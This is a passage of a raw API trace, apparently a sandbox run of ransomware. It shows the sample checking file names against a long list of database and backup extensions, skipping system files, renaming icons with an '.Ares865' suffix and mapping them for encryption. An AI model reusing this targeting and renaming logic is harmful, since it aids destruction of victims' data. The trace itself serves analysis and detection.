lpString2="rbf") returned -1 [0085.855] lstrlenW (lpString="rctd") returned 4 [0085.855] lstrcmpiW (lpString1=".ico", lpString2="rctd") returned -1 [0085.855] lstrlenW (lpString="rod") returned 3 [0085.855] lstrcmpiW (lpString1="ico", lpString2="rod") returned -1 [0085.855] lstrlenW (lpString="rodx") returned 4 [0085.855] lstrcmpiW (lpString1=".ico", lpString2="rodx") returned -1 [0085.855] lstrlenW (lpString="rpd") returned 3 [0085.855] lstrcmpiW (lpString1="ico", lpString2="rpd") returned -1 [0085.855] lstrlenW (lpString="rsd") returned 3 [0085.855] lstrcmpiW (lpString1="ico", lpString2="rsd") returned -1 [0085.855] lstrlenW (lpString="sas7bdat") returned 8 [0085.855] lstrcmpiW (lpString1="Site.ico", lpString2="sas7bdat") returned 1 [0085.855] lstrlenW (lpString="sbf") returned 3 [0085.855] lstrcmpiW (lpString1="ico", lpString2="sbf") returned -1 [0085.855] lstrlenW (lpString="scx") returned 3 [0085.856] lstrcmpiW (lpString1="ico", lpString2="scx") returned -1 [0085.856] lstrlenW (lpString="sdb") returned 3 [0085.856] lstrcmpiW (lpString1="ico", lpString2="sdb") returned -1 [0085.856] lstrlenW (lpString="sdc") returned 3 [0085.856] lstrcmpiW (lpString1="ico", lpString2="sdc") returned -1 [0085.856] lstrlenW (lpString="sdf") returned 3 [0085.856] lstrcmpiW (lpString1="ico", lpString2="sdf") returned -1 [0085.856] lstrlenW (lpString="sis") returned 3 [0085.856] lstrcmpiW (lpString1="ico", lpString2="sis") returned -1 [0085.856] lstrlenW (lpString="spq") returned 3 [0085.856] lstrcmpiW (lpString1="ico", lpString2="spq") returned -1 [0085.856] lstrlenW (lpString="te") returned 2 [0085.856] lstrcmpiW (lpString1="co", lpString2="te") returned -1 [0085.856] lstrlenW (lpString="teacher") returned 7 [0085.856] lstrcmpiW (lpString1="ite.ico", lpString2="teacher") returned -1 [0085.856] lstrlenW (lpString="tmd") returned 3 [0085.856] lstrcmpiW (lpString1="ico", lpString2="tmd") returned -1 [0085.856] lstrlenW (lpString="tps") returned 3 [0085.856] lstrcmpiW (lpString1="ico", lpString2="tps") returned -1 [0085.856] lstrlenW (lpString="trc") returned 3 [0085.856] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0085.856] lstrlenW (lpString="trc") returned 3 [0085.856] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0085.856] lstrlenW (lpString="trm") returned 3 [0085.856] lstrcmpiW (lpString1="ico", lpString2="trm") returned -1 [0085.856] lstrlenW (lpString="udb") returned 3 [0085.856] lstrcmpiW (lpString1="ico", lpString2="udb") returned -1 [0085.861] lstrlenW (lpString="udl") returned 3 [0085.861] lstrcmpiW (lpString1="ico", lpString2="udl") returned -1 [0085.861] lstrlenW (lpString="usr") returned 3 [0085.861] lstrcmpiW (lpString1="ico", lpString2="usr") returned -1 [0085.861] lstrlenW (lpString="v12") returned 3 [0085.861] lstrcmpiW (lpString1="ico", lpString2="v12") returned -1 [0085.861] lstrlenW (lpString="vis") returned 3 [0085.861] lstrcmpiW (lpString1="ico", lpString2="vis") returned -1 [0085.861] lstrlenW (lpString="vpd") returned 3 [0085.861] lstrcmpiW (lpString1="ico", lpString2="vpd") returned -1 [0085.861] lstrlenW (lpString="vvv") returned 3 [0085.861] lstrcmpiW (lpString1="ico", lpString2="vvv") returned -1 [0085.861] lstrlenW (lpString="wdb") returned 3 [0085.861] lstrcmpiW (lpString1="ico", lpString2="wdb") returned -1 [0085.861] lstrlenW (lpString="wmdb") returned 4 [0085.861] lstrcmpiW (lpString1=".ico", lpString2="wmdb") returned -1 [0085.861] lstrlenW (lpString="wrk") returned 3 [0085.861] lstrcmpiW (lpString1="ico", lpString2="wrk") returned -1 [0085.861] lstrlenW (lpString="xdb") returned 3 [0085.861] lstrcmpiW (lpString1="ico", lpString2="xdb") returned -1 [0085.861] lstrlenW (lpString="xld") returned 3 [0085.861] lstrcmpiW (lpString1="ico", lpString2="xld") returned -1 [0085.861] lstrlenW (lpString="xmlff") returned 5 [0085.861] lstrcmpiW (lpString1="e.ico", lpString2="xmlff") returned -1 [0085.861] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\MySite.ico.Ares865") returned 54 [0085.861] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\MySite.ico" (normalized: "c:\\users\\all users\\microsoft\\office\\mysite.ico"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\MySite.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\mysite.ico.ares865"), dwFlags=0x1) returned 1 [0085.863] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\MySite.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\mysite.ico.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0085.863] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=25214) returned 1 [0085.863] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0085.863] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0085.863] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0085.863] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0085.864] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0085.864] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0085.864] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6580, lpName=0x0) returned 0x15c [0085.866] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6580) returned 0x190000 [0085.868] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0085.869] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0085.869] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0085.869] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0085.869] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0085.869] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0085.869] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0085.869] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0085.869] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0085.869] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0085.869] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0085.869] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0085.869] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0085.869] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0085.870] CloseHandle (hObject=0x15c) returned 1 [0085.870] CloseHandle (hObject=0x118) returned 1 [0085.870] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0085.870] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0085.870] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0085.870] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf2444900, ftCreationTime.dwHighDateTime=0x1c63848, ftLastAccessTime.dwLowDateTime=0x5ab49610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf2444900, ftLastWriteTime.dwHighDateTime=0x1c63848, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SharePointPortalSite.ico", cAlternateFileName="SHAREP~1.ICO")) returned 1 [0085.870] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0085.870] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2="aoldtz.exe") returned 1 [0085.870] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2=".") returned 1 [0085.870] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2="..") returned 1 [0085.870] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2="windows") returned -1 [0085.870] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2="bootmgr") returned 1 [0085.870] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2="temp") returned -1 [0085.870] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2="pagefile.sys") returned 1 [0085.870] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2="boot") returned 1 [0085.870] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2="ids.txt") returned 1 [0085.870] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2="ntuser.dat") returned 1 [0085.870] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2="perflogs") returned 1 [0085.870] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2="MSBuild") returned 1 [0085.870] lstrlenW (lpString="SharePointPortalSite.ico") returned 24 [0085.871] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\MySite.ico") returned 46 [0085.871] lstrcpyW (in: lpString1=0x2cce448, lpString2="SharePointPortalSite.ico" | out: lpString1="SharePointPortalSite.ico") returned="SharePointPortalSite.ico" [0085.871] lstrlenW (lpString="SharePointPortalSite.ico") returned 24 [0085.871] lstrlenW (lpString="Ares865") returned 7 [0085.871] lstrcmpiW (lpString1="ite.ico", lpString2="Ares865") returned 1 [0085.871] lstrlenW (lpString=".dll") returned 4 [0085.871] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2=".dll") returned 1 [0085.871] lstrlenW (lpString=".lnk") returned 4 [0085.871] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2=".lnk") returned 1 [0085.871] lstrlenW (lpString=".ini") returned 4 [0085.871] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2=".ini") returned 1 [0085.871] lstrlenW (lpString=".sys") returned 4 [0085.871] lstrcmpiW (lpString1="SharePointPortalSite.ico", lpString2=".sys") returned 1 [0085.871] lstrlenW (lpString="SharePointPortalSite.ico") returned 24 [0085.871] lstrlenW (lpString="bak") returned 3 [0085.871] lstrcmpiW (lpString1="ico", lpString2="bak") returned 1 [0085.871] lstrlenW (lpString="ba_") returned 3 [0085.871] lstrcmpiW (lpString1="ico", lpString2="ba_") returned 1 [0085.871] lstrlenW (lpString="dbb") returned 3 [0085.871] lstrcmpiW (lpString1="ico", lpString2="dbb") returned 1 [0085.871] lstrlenW (lpString="vmdk") returned 4 [0085.871] lstrcmpiW (lpString1=".ico", lpString2="vmdk") returned -1 [0085.871] lstrlenW (lpString="rar") returned 3 [0085.871] lstrcmpiW (lpString1="ico", lpString2="rar") returned -1 [0085.871] lstrlenW (lpString="zip") returned 3 [0085.871] lstrcmpiW (lpString1="ico", lpString2="zip") returned -1 [0085.871] lstrlenW (lpString="tgz") returned 3 [0085.871] lstrcmpiW (lpString1="ico", lpString2="tgz") returned -1 [0085.871] lstrlenW (lpString="vbox") returned 4 [0085.871] lstrcmpiW (lpString1=".ico", lpString2="vbox") returned -1 [0085.871] lstrlenW (lpString="vdi") returned 3 [0085.871] lstrcmpiW (lpString1="ico", lpString2="vdi") returned -1 [0085.871] lstrlenW (lpString="vhd") returned 3 [0085.871] lstrcmpiW (lpString1="ico", lpString2="vhd") returned -1 [0085.871] lstrlenW (lpString="vhdx") returned 4 [0085.871] lstrcmpiW (lpString1=".ico", lpString2="vhdx") returned -1 [0085.872] lstrlenW (lpString="avhd") returned 4 [0085.872] lstrcmpiW (lpString1=".ico", lpString2="avhd") returned -1 [0085.872] lstrlenW (lpString="db") returned 2 [0085.872] lstrcmpiW (lpString1="co", lpString2="db") returned -1 [0085.872] lstrlenW (lpString="db2") returned 3 [0085.872] lstrcmpiW (lpString1="ico", lpString2="db2") returned 1 [0085.872] lstrlenW (lpString="db3") returned 3 [0085.872] lstrcmpiW (lpString1="ico", lpString2="db3") returned 1 [0085.872] lstrlenW (lpString="dbf") returned 3 [0085.872] lstrcmpiW (lpString1="ico", lpString2="dbf") returned 1 [0085.872] lstrlenW (lpString="mdf") returned 3 [0085.872] lstrcmpiW (lpString1="ico", lpString2="mdf") returned -1 [0085.872] lstrlenW (lpString="mdb") returned 3 [0085.872] lstrcmpiW (lpString1="ico", lpString2="mdb") returned -1 [0085.872] lstrlenW (lpString="sql") returned 3 [0085.872] lstrcmpiW (lpString1="ico", lpString2="sql") returned -1 [0085.872] lstrlenW (lpString="sqlite") returned 6 [0085.872] lstrcmpiW (lpString1="te.ico", lpString2="sqlite") returned 1 [0085.872] lstrlenW (lpString="sqlite3") returned 7 [0085.872] lstrcmpiW (lpString1="ite.ico", lpString2="sqlite3") returned -1 [0085.872] lstrlenW (lpString="sqlitedb") returned 8 [0085.872] lstrcmpiW (lpString1="Site.ico", lpString2="sqlitedb") returned -1 [0085.873] lstrlenW (lpString="xml") returned 3 [0085.873] lstrcmpiW (lpString1="ico", lpString2="xml") returned -1 [0085.873] lstrlenW (lpString="$er") returned 3 [0085.873] lstrcmpiW (lpString1="ico", lpString2="$er") returned 1 [0085.873] lstrlenW (lpString="4dd") returned 3 [0085.873] lstrcmpiW (lpString1="ico", lpString2="4dd") returned 1 [0085.873] lstrlenW (lpString="4dl") returned 3 [0085.873] lstrcmpiW (lpString1="ico", lpString2="4dl") returned 1 [0085.873] lstrlenW (lpString="^^^") returned 3 [0085.873] lstrcmpiW (lpString1="ico", lpString2="^^^") returned 1 [0085.873] lstrlenW (lpString="abs") returned 3 [0085.873] lstrcmpiW (lpString1="ico", lpString2="abs") returned 1 [0085.873] lstrlenW (lpString="abx") returned 3 [0085.873] lstrcmpiW (lpString1="ico", lpString2="abx") returned 1 [0085.873] lstrlenW (lpString="accdb") returned 5 [0085.873] lstrcmpiW (lpString1="e.ico", lpString2="accdb") returned 1 [0085.873] lstrlenW (lpString="accdc") returned 5 [0085.873] lstrcmpiW (lpString1="e.ico", lpString2="accdc") returned 1 [0085.873] lstrlenW (lpString="accde") returned 5 [0085.873] lstrcmpiW (lpString1="e.ico", lpString2="accde") returned 1 [0085.873] lstrlenW (lpString="accdr") returned 5 [0085.873] lstrcmpiW (lpString1="e.ico", lpString2="accdr") returned 1 [0085.873] lstrlenW (lpString="accdt") returned 5 [0085.873] lstrcmpiW (lpString1="e.ico", lpString2="accdt") returned 1 [0085.873] lstrlenW (lpString="accdw") returned 5 [0085.873] lstrcmpiW (lpString1="e.ico", lpString2="accdw") returned 1 [0085.873] lstrlenW (lpString="accft") returned 5 [0085.873] lstrcmpiW (lpString1="e.ico", lpString2="accft") returned 1 [0085.873] lstrlenW (lpString="adb") returned 3 [0085.873] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0085.873] lstrlenW (lpString="adb") returned 3 [0085.873] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0085.873] lstrlenW (lpString="ade") returned 3 [0085.873] lstrcmpiW (lpString1="ico", lpString2="ade") returned 1 [0085.873] lstrlenW (lpString="adf") returned 3 [0085.873] lstrcmpiW (lpString1="ico", lpString2="adf") returned 1 [0085.873] lstrlenW (lpString="adn") returned 3 [0085.873] lstrcmpiW (lpString1="ico", lpString2="adn") returned 1 [0085.874] lstrlenW (lpString="adp") returned 3 [0085.874] lstrcmpiW (lpString1="ico", lpString2="adp") returned 1 [0085.874] lstrlenW (lpString="alf") returned 3 [0085.874] lstrcmpiW (lpString1="ico", lpString2="alf") returned 1 [0085.874] lstrlenW (lpString="ask") returned 3 [0085.874] lstrcmpiW (lpString1="ico", lpString2="ask") returned 1 [0085.874] lstrlenW (lpString="btr") returned 3 [0085.874] lstrcmpiW (lpString1="ico", lpString2="btr") returned 1 [0085.874] lstrlenW (lpString="cat") returned 3 [0085.874] lstrcmpiW (lpString1="ico", lpString2="cat") returned 1 [0085.874] lstrlenW (lpString="cdb") returned 3 [0085.874] lstrcmpiW (lpString1="ico", lpString2="cdb") returned 1 [0085.874] lstrlenW (lpString="ckp") returned 3 [0085.874] lstrcmpiW (lpString1="ico", lpString2="ckp") returned 1 [0085.874] lstrlenW (lpString="cma") returned 3 [0085.874] lstrcmpiW (lpString1="ico", lpString2="cma") returned 1 [0085.874] lstrlenW (lpString="cpd") returned 3 [0085.874] lstrcmpiW (lpString1="ico", lpString2="cpd") returned 1 [0085.874] lstrlenW (lpString="dacpac") returned 6 [0085.874] lstrcmpiW (lpString1="te.ico", lpString2="dacpac") returned 1 [0085.874] lstrlenW (lpString="dad") returned 3 [0085.874] lstrcmpiW (lpString1="ico", lpString2="dad") returned 1 [0085.874] lstrlenW (lpString="dadiagrams") returned 10 [0085.874] lstrcmpiW (lpString1="alSite.ico", lpString2="dadiagrams") returned -1 [0085.874] lstrlenW (lpString="daschema") returned 8 [0085.874] lstrcmpiW (lpString1="Site.ico", lpString2="daschema") returned 1 [0085.874] lstrlenW (lpString="db-journal") returned 10 [0085.874] lstrcmpiW (lpString1="alSite.ico", lpString2="db-journal") returned -1 [0085.874] lstrlenW (lpString="db-shm") returned 6 [0085.874] lstrcmpiW (lpString1="te.ico", lpString2="db-shm") returned 1 [0085.874] lstrlenW (lpString="db-wal") returned 6 [0085.874] lstrcmpiW (lpString1="te.ico", lpString2="db-wal") returned 1 [0085.874] lstrlenW (lpString="dbc") returned 3 [0085.874] lstrcmpiW (lpString1="ico", lpString2="dbc") returned 1 [0085.874] lstrlenW (lpString="dbs") returned 3 [0085.874] lstrcmpiW (lpString1="ico", lpString2="dbs") returned 1 [0085.874] lstrlenW (lpString="dbt") returned 3 [0085.874] lstrcmpiW (lpString1="ico", lpString2="dbt") returned 1 [0085.875] lstrlenW (lpString="dbv") returned 3 [0085.875] lstrcmpiW (lpString1="ico", lpString2="dbv") returned 1 [0085.875] lstrlenW (lpString="dbx") returned 3 [0085.875] lstrcmpiW (lpString1="ico", lpString2="dbx") returned 1 [0085.875] lstrlenW (lpString="dcb") returned 3 [0085.875] lstrcmpiW (lpString1="ico", lpString2="dcb") returned 1 [0085.875] lstrlenW (lpString="dct") returned 3 [0085.875] lstrcmpiW (lpString1="ico", lpString2="dct") returned 1 [0085.875] lstrlenW (lpString="dcx") returned 3 [0085.875] lstrcmpiW (lpString1="ico", lpString2="dcx") returned 1 [0085.875] lstrlenW (lpString="ddl") returned 3 [0085.875] lstrcmpiW (lpString1="ico", lpString2="ddl") returned 1 [0085.875] lstrlenW (lpString="dlis") returned 4 [0085.875] lstrcmpiW (lpString1=".ico", lpString2="dlis") returned -1 [0085.875] lstrlenW (lpString="dp1") returned 3 [0085.875] lstrcmpiW (lpString1="ico", lpString2="dp1") returned 1 [0085.875] lstrlenW (lpString="dqy") returned 3 [0085.875] lstrcmpiW (lpString1="ico", lpString2="dqy") returned 1 [0085.875] lstrlenW (lpString="dsk") returned 3 [0085.875] lstrcmpiW (lpString1="ico", lpString2="dsk") returned 1 [0085.875] lstrlenW (lpString="dsn") returned 3 [0085.875] lstrcmpiW (lpString1="ico", lpString2="dsn") returned 1 [0085.875] lstrlenW (lpString="dtsx") returned 4 [0085.875] lstrcmpiW (lpString1=".ico", lpString2="dtsx") returned -1 [0085.875] lstrlenW (lpString="dxl") returned 3 [0085.875] lstrcmpiW (lpString1="ico", lpString2="dxl") returned 1 [0085.875] lstrlenW (lpString="eco") returned 3 [0085.875] lstrcmpiW (lpString1="ico", lpString2="eco") returned 1 [0085.875] lstrlenW (lpString="ecx") returned 3 [0085.875] lstrcmpiW (lpString1="ico", lpString2="ecx") returned 1 [0085.875] lstrlenW (lpString="edb") returned 3 [0085.875] lstrcmpiW (lpString1="ico", lpString2="edb") returned 1 [0085.875] lstrlenW (lpString="epim") returned 4 [0085.875] lstrcmpiW (lpString1=".ico", lpString2="epim") returned -1 [0085.875] lstrlenW (lpString="fcd") returned 3 [0085.875] lstrcmpiW (lpString1="ico", lpString2="fcd") returned 1 [0085.875] lstrlenW (lpString="fdb") returned 3 [0085.875] lstrcmpiW (lpString1="ico", lpString2="fdb") returned 1 [0085.876] lstrlenW (lpString="fic") returned 3 [0085.876] lstrcmpiW (lpString1="ico", lpString2="fic") returned 1 [0085.876] lstrlenW (lpString="flexolibrary") returned 12 [0085.876] lstrcmpiW (lpString1="rtalSite.ico", lpString2="flexolibrary") returned 1 [0085.876] lstrlenW (lpString="fm5") returned 3 [0085.876] lstrcmpiW (lpString1="ico", lpString2="fm5") returned 1 [0085.876] lstrlenW (lpString="fmp") returned 3 [0085.876] lstrcmpiW (lpString1="ico", lpString2="fmp") returned 1 [0085.876] lstrlenW (lpString="fmp12") returned 5 [0085.876] lstrcmpiW (lpString1="e.ico", lpString2="fmp12") returned -1 [0085.876] lstrlenW (lpString="fmpsl") returned 5 [0085.876] lstrcmpiW (lpString1="e.ico", lpString2="fmpsl") returned -1 [0085.876] lstrlenW (lpString="fol") returned 3 [0085.876] lstrcmpiW (lpString1="ico", lpString2="fol") returned 1 [0085.876] lstrlenW (lpString="fp3") returned 3 [0085.876] lstrcmpiW (lpString1="ico", lpString2="fp3") returned 1 [0085.876] lstrlenW (lpString="fp4") returned 3 [0085.876] lstrcmpiW (lpString1="ico", lpString2="fp4") returned 1 [0085.876] lstrlenW (lpString="fp5") returned 3 [0085.876] lstrcmpiW (lpString1="ico", lpString2="fp5") returned 1 [0085.876] lstrlenW (lpString="fp7") returned 3 [0085.876] lstrcmpiW (lpString1="ico", lpString2="fp7") returned 1 [0085.876] lstrlenW (lpString="fpt") returned 3 [0085.876] lstrcmpiW (lpString1="ico", lpString2="fpt") returned 1 [0085.876] lstrlenW (lpString="frm") returned 3 [0085.876] lstrcmpiW (lpString1="ico", lpString2="frm") returned 1 [0085.876] lstrlenW (lpString="gdb") returned 3 [0085.876] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0085.876] lstrlenW (lpString="gdb") returned 3 [0085.876] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0085.876] lstrlenW (lpString="grdb") returned 4 [0085.876] lstrcmpiW (lpString1=".ico", lpString2="grdb") returned -1 [0085.876] lstrlenW (lpString="gwi") returned 3 [0085.876] lstrcmpiW (lpString1="ico", lpString2="gwi") returned 1 [0085.876] lstrlenW (lpString="hdb") returned 3 [0085.876] lstrcmpiW (lpString1="ico", lpString2="hdb") returned 1 [0085.876] lstrlenW (lpString="his") returned 3 [0085.876] lstrcmpiW (lpString1="ico", lpString2="his") returned 1 [0085.877] lstrlenW (lpString="ib") returned 2 [0085.877] lstrcmpiW (lpString1="co", lpString2="ib") returned -1 [0085.877] lstrlenW (lpString="idb") returned 3 [0085.877] lstrcmpiW (lpString1="ico", lpString2="idb") returned -1 [0085.877] lstrlenW (lpString="ihx") returned 3 [0085.877] lstrcmpiW (lpString1="ico", lpString2="ihx") returned -1 [0085.877] lstrlenW (lpString="itdb") returned 4 [0085.877] lstrcmpiW (lpString1=".ico", lpString2="itdb") returned -1 [0085.877] lstrlenW (lpString="itw") returned 3 [0085.877] lstrcmpiW (lpString1="ico", lpString2="itw") returned -1 [0085.877] lstrlenW (lpString="jet") returned 3 [0085.877] lstrcmpiW (lpString1="ico", lpString2="jet") returned -1 [0085.877] lstrlenW (lpString="jtx") returned 3 [0085.877] lstrcmpiW (lpString1="ico", lpString2="jtx") returned -1 [0085.877] lstrlenW (lpString="kdb") returned 3 [0085.877] lstrcmpiW (lpString1="ico", lpString2="kdb") returned -1 [0085.877] lstrlenW (lpString="kexi") returned 4 [0085.877] lstrcmpiW (lpString1=".ico", lpString2="kexi") returned -1 [0085.877] lstrlenW (lpString="kexic") returned 5 [0085.877] lstrcmpiW (lpString1="e.ico", lpString2="kexic") returned -1 [0085.877] lstrlenW (lpString="kexis") returned 5 [0085.877] lstrcmpiW (lpString1="e.ico", lpString2="kexis") returned -1 [0085.877] lstrlenW (lpString="lgc") returned 3 [0085.877] lstrcmpiW (lpString1="ico", lpString2="lgc") returned -1 [0085.877] lstrlenW (lpString="lwx") returned 3 [0085.877] lstrcmpiW (lpString1="ico", lpString2="lwx") returned -1 [0085.877] lstrlenW (lpString="maf") returned 3 [0085.877] lstrcmpiW (lpString1="ico", lpString2="maf") returned -1 [0085.877] lstrlenW (lpString="maq") returned 3 [0085.877] lstrcmpiW (lpString1="ico", lpString2="maq") returned -1 [0085.877] lstrlenW (lpString="mar") returned 3 [0085.877] lstrcmpiW (lpString1="ico", lpString2="mar") returned -1 [0085.877] lstrlenW (lpString="marshal") returned 7 [0085.877] lstrcmpiW (lpString1="ite.ico", lpString2="marshal") returned -1 [0085.877] lstrlenW (lpString="mas") returned 3 [0085.877] lstrcmpiW (lpString1="ico", lpString2="mas") returned -1 [0085.877] lstrlenW (lpString="mav") returned 3 [0085.877] lstrcmpiW (lpString1="ico", lpString2="mav") returned -1 [0085.878] lstrlenW (lpString="maw") returned 3 [0085.878] lstrcmpiW (lpString1="ico", lpString2="maw") returned -1 [0085.878] lstrlenW (lpString="mdbhtml") returned 7 [0085.878] lstrcmpiW (lpString1="ite.ico", lpString2="mdbhtml") returned -1 [0085.878] lstrlenW (lpString="mdn") returned 3 [0085.878] lstrcmpiW (lpString1="ico", lpString2="mdn") returned -1 [0085.878] lstrlenW (lpString="mdt") returned 3 [0085.878] lstrcmpiW (lpString1="ico", lpString2="mdt") returned -1 [0085.878] lstrlenW (lpString="mfd") returned 3 [0085.878] lstrcmpiW (lpString1="ico", lpString2="mfd") returned -1 [0085.878] lstrlenW (lpString="mpd") returned 3 [0085.878] lstrcmpiW (lpString1="ico", lpString2="mpd") returned -1 [0085.878] lstrlenW (lpString="mrg") returned 3 [0085.878] lstrcmpiW (lpString1="ico", lpString2="mrg") returned -1 [0085.878] lstrlenW (lpString="mud") returned 3 [0085.878] lstrcmpiW (lpString1="ico", lpString2="mud") returned -1 [0085.878] lstrlenW (lpString="mwb") returned 3 [0085.878] lstrcmpiW (lpString1="ico", lpString2="mwb") returned -1 [0085.878] lstrlenW (lpString="myd") returned 3 [0085.878] lstrcmpiW (lpString1="ico", lpString2="myd") returned -1 [0085.878] lstrlenW (lpString="ndf") returned 3 [0085.878] lstrcmpiW (lpString1="ico", lpString2="ndf") returned -1 [0085.878] lstrlenW (lpString="nnt") returned 3 [0085.878] lstrcmpiW (lpString1="ico", lpString2="nnt") returned -1 [0085.878] lstrlenW (lpString="nrmlib") returned 6 [0085.878] lstrcmpiW (lpString1="te.ico", lpString2="nrmlib") returned 1 [0085.878] lstrlenW (lpString="ns2") returned 3 [0085.878] lstrcmpiW (lpString1="ico", lpString2="ns2") returned -1 [0085.878] lstrlenW (lpString="ns3") returned 3 [0085.878] lstrcmpiW (lpString1="ico", lpString2="ns3") returned -1 [0085.878] lstrlenW (lpString="ns4") returned 3 [0085.878] lstrcmpiW (lpString1="ico", lpString2="ns4") returned -1 [0085.878] lstrlenW (lpString="nsf") returned 3 [0085.878] lstrcmpiW (lpString1="ico", lpString2="nsf") returned -1 [0085.878] lstrlenW (lpString="nv") returned 2 [0085.878] lstrcmpiW (lpString1="co", lpString2="nv") returned -1 [0085.878] lstrlenW (lpString="nv2") returned 3 [0085.878] lstrcmpiW (lpString1="ico", lpString2="nv2") returned -1 [0085.879] lstrlenW (lpString="nwdb") returned 4 [0085.879] lstrcmpiW (lpString1=".ico", lpString2="nwdb") returned -1 [0085.879] lstrlenW (lpString="nyf") returned 3 [0085.879] lstrcmpiW (lpString1="ico", lpString2="nyf") returned -1 [0085.879] lstrlenW (lpString="odb") returned 3 [0085.879] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0085.879] lstrlenW (lpString="odb") returned 3 [0085.879] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0085.879] lstrlenW (lpString="oqy") returned 3 [0085.879] lstrcmpiW (lpString1="ico", lpString2="oqy") returned -1 [0085.879] lstrlenW (lpString="ora") returned 3 [0085.879] lstrcmpiW (lpString1="ico", lpString2="ora") returned -1 [0085.879] lstrlenW (lpString="orx") returned 3 [0085.879] lstrcmpiW (lpString1="ico", lpString2="orx") returned -1 [0085.879] lstrlenW (lpString="owc") returned 3 [0085.879] lstrcmpiW 